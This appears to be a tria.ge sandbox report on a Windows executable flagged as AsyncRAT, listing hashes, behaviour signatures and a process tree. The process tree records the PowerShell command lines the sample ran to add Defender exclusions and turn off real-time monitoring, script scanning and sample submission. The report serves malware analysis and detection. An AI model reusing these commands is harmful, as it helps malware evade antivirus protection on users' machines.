Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    144s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    29/06/2024, 01:58

General

  • Target

    fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe

  • Size

    405KB

  • MD5

    c4e10100c5cf7bec2d9d0a1d7203ddb2

  • SHA1

    24a6ecd52fb2165b8563a2853898316851638871

  • SHA256

    fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7

  • SHA512

    ff6bd9bdcb95641c5e19aeef99d9cdddb33b5b309ec358a1a50ba00d2cea9a3fa22a0239b4e09d4a8904d4b7f470bbc621d5e0d60331bc5800709d308faf3202

  • SSDEEP

    6144:0NYzj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZbYdNpmIU:eYzAq81g5aN+BoKD

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
    "C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe"
    1⤵
    • Adds Run key to start application
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1904
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2980
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2736
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2856
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2608
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:276
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1568
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2680

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    7cedbe448585e24df571f62dad6af14e

    SHA1

    b4fbb0810daa982975c72b2962086a7ce8870f84

    SHA256

    990495ff8e54a2865c814770ed0313879fa08db7388f245273490e71f2be35f0

    SHA512

    89c9f203e193a66b13936207fb47d2587e3f9b223c987801e720d014131fe03c340b698761bee9a53db3be8ffb8a1858eea5816f9a1bedb7e5320c450532e23f

  • memory/1568-30-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

    Filesize

    2.9MB

  • memory/1568-31-0x0000000001E10000-0x0000000001E18000-memory.dmp

    Filesize

    32KB

  • memory/1904-0-0x000007FEF52F3000-0x000007FEF52F4000-memory.dmp

    Filesize

    4KB

  • memory/1904-1-0x0000000000C50000-0x0000000000CBC000-memory.dmp

    Filesize

    432KB

  • memory/1904-2-0x000007FEF52F0000-0x000007FEF5CDC000-memory.dmp

    Filesize

    9.9MB

  • memory/1904-38-0x000007FEF52F3000-0x000007FEF52F4000-memory.dmp

    Filesize

    4KB

  • memory/1904-39-0x000007FEF52F0000-0x000007FEF5CDC000-memory.dmp

    Filesize

    9.9MB

  • memory/2608-17-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2856-18-0x0000000001F40000-0x0000000001F48000-memory.dmp

    Filesize

    32KB